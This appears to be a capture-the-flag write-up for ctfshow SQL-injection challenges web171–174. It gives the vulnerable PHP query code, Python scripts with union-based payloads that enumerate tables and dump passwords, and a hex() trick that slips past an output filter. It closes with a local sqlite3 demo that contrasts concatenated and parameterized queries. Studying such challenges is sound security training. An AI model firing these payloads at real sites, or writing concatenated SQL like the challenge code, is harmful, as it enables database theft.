CtfShow SQL Injection (continuously updated)

小海
2022-10-19 / 0 comments / 0 likes / 918 reads / 2,397 characters

CtfShow SQL Injection

web171

Challenge source (PHP), the query statement:

// Build the SQL string by concatenating the user-supplied id to look up that user
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

Character-type (string-quoted) injection with no filtering at all.

Exploit script (Python):

import requests

url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# Enumerate the table names in the current database
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
# Enumerate the column names of ctfshow_user
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# Dump the data
payload = "-1' union select id,username,password from ctfshow_user --+"
res = requests.get(url + payload)
print(res.text)

web172

Challenge source (PHP):

// Build the SQL string by concatenating the user-supplied id to look up that user
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}

Unfiltered character-type injection, with the added restriction username!='flag' on the returned row.

Exploit script (Python):

import requests

url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
# Enumerate the table names in the current database
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
# Enumerate the column names of ctfshow_user2
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
# Read the flag user's password through a subquery; the returned username column is the literal 1, so the username!=='flag' check passes
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"
res = requests.get(url + payload)
print(res.text)

web173

Challenge source (PHP):

// Build the SQL string by concatenating the user-supplied id to look up that user
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if(!preg_match('/flag/i', json_encode($ret))){
    $ret['msg']='查询成功';
}

The injection itself is still unfiltered; what was added is a check that the JSON-encoded result does not match the regular expression /flag/i.
Use the hex() function to bypass the regex filter.

Exploit script (Python):

import requests

url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
# Enumerate the table names in the current database
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
# Enumerate the column names of ctfshow_user3, hex-encoded so the response check cannot match
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
# Read the flag user's password, hex-encoded so the string "flag" never appears in the response
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"
res = requests.get(url + payload)
print(res.text)

web174

Challenge source (PHP):

// Build the SQL string by concatenating the user-supplied id to look up that user
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}
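Added example, not part of this writeup or of the ctfshow challenge code: a local sqlite3 reproduction of the web173 pattern, written from the defender's side. It runs the writeup's hex() payload against a query that concatenates id (the challenge's form) and against a parameterized query, and reproduces the /flag/i response check so you can see why it is not a mitigation. The table name and columns follow the challenge; the rows, the flag value, and all function names are constructed for this example. SQLite's hex() behaves like MySQL's for this purpose (uppercase hex of the bytes).

```python
import json
import re
import sqlite3

# Constructed sample rows standing in for the challenge's ctfshow_user3 table
# (the flag value is made up for this example).
SAMPLE_ROWS = [
    (1, "alice", "pw-alice"),
    (2, "bob", "pw-bob"),
    (3, "flag", "ctfshow{constructed_sample_flag}"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ctfshow_user3 (id integer, username text, password text)")
    conn.executemany("insert into ctfshow_user3 values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_concat(conn, user_id):
    """Vulnerable form: mirrors the challenge's string concatenation of $_GET['id']."""
    sql = ("select id,username,password from ctfshow_user3 "
           "where username != 'flag' and id = '" + user_id + "' limit 1")
    return conn.execute(sql).fetchall()


def query_param(conn, user_id):
    """Hardened form: id is bound as a parameter and is never parsed as SQL."""
    sql = ("select id,username,password from ctfshow_user3 "
           "where username != 'flag' and id = ? limit 1")
    return conn.execute(sql, (user_id,)).fetchall()


def id_is_wellformed(user_id):
    """Allow-list check for the id parameter: digits only, as the route expects."""
    return re.fullmatch(r"[0-9]+", user_id) is not None


def response_check_passes(rows):
    """Mirrors web173's !preg_match('/flag/i', json_encode($ret)) response check."""
    return re.search(r"flag", json.dumps(rows), re.I) is None


# The web173 payload from the writeup: hex() keeps the letters f-l-a-g out of the response.
WEB173_PAYLOAD = ("-1' union select 1,2,hex((select password from ctfshow_user3 "
                  "where username='flag')) --+")


def demo():
    """Run the payload against both query forms and report what each returns."""
    conn = make_db()
    leaked = query_concat(conn, WEB173_PAYLOAD)
    safe = query_param(conn, WEB173_PAYLOAD)
    return {
        "concat_rows": leaked,
        "concat_passes_response_check": response_check_passes(leaked),
        "concat_decoded": bytes.fromhex(leaked[0][2]).decode() if leaked else None,
        "param_rows": safe,
        "payload_wellformed": id_is_wellformed(WEB173_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the file shows the concatenated query returning the hex-encoded flag row while the response check still reports it as clean, and the parameterized query returning nothing for the same input. The point for a code reviewer is that both the username != 'flag' clause and the regex on the JSON output are filters on the result, not on the query; only binding the id (plus rejecting non-numeric ids before the query is built) removes the injection.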
